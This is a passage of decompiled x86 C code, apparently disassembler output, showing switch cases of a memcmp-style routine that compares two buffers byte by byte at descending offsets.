																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
																	if(_t1058 ==  *(_t1340 - 0x18)) {
																		goto L162;
																	} else {
																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t280 = _t1270 > 0;
																			__eflags = _t280;
																			_t1270 = (0 | _t280) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t286 = _t1270 > 0;
																				__eflags = _t286;
																				_t1270 = (0 | _t286) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t292 = _t1270 > 0;
																					__eflags = _t292;
																					_t1270 = (0 | _t292) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x15) & 0x000000ff) - ( *(_t1340 - 0x15) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t298 = _t1270 > 0;
																						__eflags = _t298;
																						_t1270 = (0 | _t298) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L162;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x19:
																	L242:
																	__eax =  *(__esi - 0x19);
																	__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
																	if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
																		goto L255;
																	} else {
																		__eax =  *(__edx - 0x19) & 0x000000ff;
																		__ecx =  *(__esi - 0x19) & 0x000000ff;
																		__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t456 = __ecx > 0;
																			__eflags = _t456;
																			__eax = 0 | _t456;
																			__ecx = _t456 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x18) & 0x000000ff;
																			__eax =  *(__edx - 0x18) & 0x000000ff;
																			__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t462 = __ecx > 0;
																				__eflags = _t462;
																				__eax = 0 | _t462;
																				__ecx = _t462 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x17) & 0x000000ff;
																				__eax =  *(__edx - 0x17) & 0x000000ff;
																				__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t468 = __ecx > 0;
																					__eflags = _t468;
																					__eax = 0 | _t468;
																					__ecx = _t468 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x16) & 0x000000ff;
																					__eax =  *(__edx - 0x16) & 0x000000ff;
																					__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t474 = __ecx > 0;
																						__eflags = _t474;
																						__eax = 0 | _t474;
																						__ecx = _t474 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L255;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1a:
																	L335:
																	__eax =  *(__esi - 0x1a);
																	__eflags =  *(__esi - 0x1a) -  *(__edx - 0x1a);
																	if( *(__esi - 0x1a) ==  *(__edx - 0x1a)) {
																		goto L348;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1a) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t638 = __ecx > 0;
																			__eflags = _t638;
																			__eax = 0 | _t638;
																			__ecx = _t638 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x19) & 0x000000ff;
																			__eax =  *(__edx - 0x19) & 0x000000ff;
																			__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t644 = __ecx > 0;
																				__eflags = _t644;
																				__eax = 0 | _t644;
																				__ecx = _t644 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x18) & 0x000000ff;
																				__eax =  *(__edx - 0x18) & 0x000000ff;
																				__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t650 = __ecx > 0;
																					__eflags = _t650;
																					__eax = 0 | _t650;
																					__ecx = _t650 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x17) & 0x000000ff;
																					__eax =  *(__edx - 0x17) & 0x000000ff;
																					__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t656 = __ecx > 0;
																						__eflags = _t656;
																						__eax = 0 | _t656;
																						__ecx = _t656 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L348;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1b:
																	L428:
																	__eax =  *(__esi - 0x1b);
																	__eflags =  *(__esi - 0x1b) -  *(__edx - 0x1b);
																	if( *(__esi - 0x1b) ==  *(__edx - 0x1b)) {
																		goto L441;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1b) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t816 = __ecx > 0;
																			__eflags = _t816;
																			__eax = 0 | _t816;
																			__ecx = _t816 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x1a) & 0x000000ff;
																			__eax =  *(__edx - 0x1a) & 0x000000ff;
																			__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t822 = __ecx > 0;
																				__eflags = _t822;
																				__eax = 0 | _t822;
																				__ecx = _t822 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x19) & 0x000000ff;
																				__eax =  *(__edx - 0x19) & 0x000000ff;
																				__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t828 = __ecx > 0;
																					__eflags = _t828;
																					__eax = 0 | _t828;
																					__ecx = _t828 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x18) & 0x000000ff;
																					__eax =  *(__edx - 0x18) & 0x000000ff;
																					__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t834 = __ecx > 0;
																						__eflags = _t834;
																						__eax = 0 | _t834;
																						__ecx = _t834 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L441;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1c:
																	_t1057 =  *(_t1354 - 0x1c);
																	__eflags = _t1057 -  *(_t1340 - 0x1c);
																	if(_t1057 ==  *(_t1340 - 0x1c)) {
																		goto L149;
																	} else {
																		_t1270 = (_t1057 & 0x000000ff) - ( *(_t1340 - 0x1c) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t255 = _t1270 > 0;
																			__eflags = _t255;
																			_t1270 = (0 | _t255) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x1b) & 0x000000ff) - ( *(_t1340 - 0x1b) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t261 = _t1270 > 0;
																				__eflags = _t261;
																				_t1270 = (0 | _t261) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x1a) & 0x000000ff) - ( *(_t1340 - 0x1a) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t267 = _t1270 > 0;
																					__eflags = _t267;
																					_t1270 = (0 | _t267) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x19) & 0x000000ff) - ( *(_t1340 - 0x19) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t273 = _t1270 > 0;
																						__eflags = _t273;
																						_t1270 = (0 | _t273) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L149;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x1d:
																	__eax =  *(__esi - 0x1d);
																	__eflags =  *(__esi - 0x1d) -  *(__edx - 0x1d);
																	if( *(__esi - 0x1d) ==  *(__edx - 0x1d)) {
																		goto L242;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1d) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t430 = __ecx > 0;
																			__eflags = _t430;
																			__eax = 0 | _t430;
																			__ecx = _t430 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x1c) & 0x000000ff;
																			__eax =  *(__edx - 0x1c) & 0x000000ff;
																			__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t436 = __ecx > 0;
																				__eflags = _t436;
																				__eax = 0 | _t436;
																				__ecx = _t436 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x1b) & 0x000000ff;
																				__eax =  *(__edx - 0x1b) & 0x000000ff;
																				__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t442 = __ecx > 0;
																					__eflags = _t442;
																					__eax = 0 | _t442;
																					__ecx = _t442 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x1a) & 0x000000ff;
																					__eax =  *(__edx - 0x1a) & 0x000000ff;
																					__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t448 = __ecx > 0;
																						__eflags = _t448;
																						__eax = 0 | _t448;
																						__ecx = _t448 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L242;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1e:
																	__eax =  *(__esi - 0x1e);
																	__eflags =  *(__esi - 0x1e) -  *(__edx - 0x1e);
																	if( *(__esi - 0x1e) ==  *(__edx - 0x1e)) {
																		goto L335;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1e) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t613 = __ecx > 0;
																			__eflags = _t613;
																			__eax = 0 | _t613;
																			__ecx = _t613 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x1d) & 0x000000ff;
																			__eax =  *(__edx - 0x1d) & 0x000000ff;
																			__ecx = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t619 = __ecx > 0;
																				__eflags = _t619;
																				__eax = 0 | _t619;
																				__ecx = _t619 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x1c) & 0x000000ff;
																				__eax =  *(__edx - 0x1c) & 0x000000ff;
																				__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t625 = __ecx > 0;
																					__eflags = _t625;
																					__eax = 0 | _t625;
																					__ecx = _t625 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x1b) & 0x000000ff;
																					__eax =  *(__edx - 0x1b) & 0x000000ff;
																					__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t631 = __ecx > 0;
																						__eflags = _t631;
																						__eax = 0 | _t631;
																						__ecx = _t631 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L335;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x1f:
																	__eax =  *(__esi - 0x1f);
																	__eflags =  *(__esi - 0x1f) -  *(__edx - 0x1f);
																	if( *(__esi - 0x1f) ==  *(__edx - 0x1f)) {
																		goto L428;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1f) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t791 = __ecx > 0;
																			__eflags = _t791;
																			__eax = 0 | _t791;
																			__ecx = _t791 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x1e) & 0x000000ff;
																			__eax =  *(__edx - 0x1e) & 0x000000ff;
																			__ecx = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t797 = __ecx > 0;
																				__eflags = _t797;
																				__eax = 0 | _t797;
																				__ecx = _t797 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x1d) & 0x000000ff;
																				__eax =  *(__edx - 0x1d) & 0x000000ff;
																				__ecx = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
																				__eflags = __ecx;
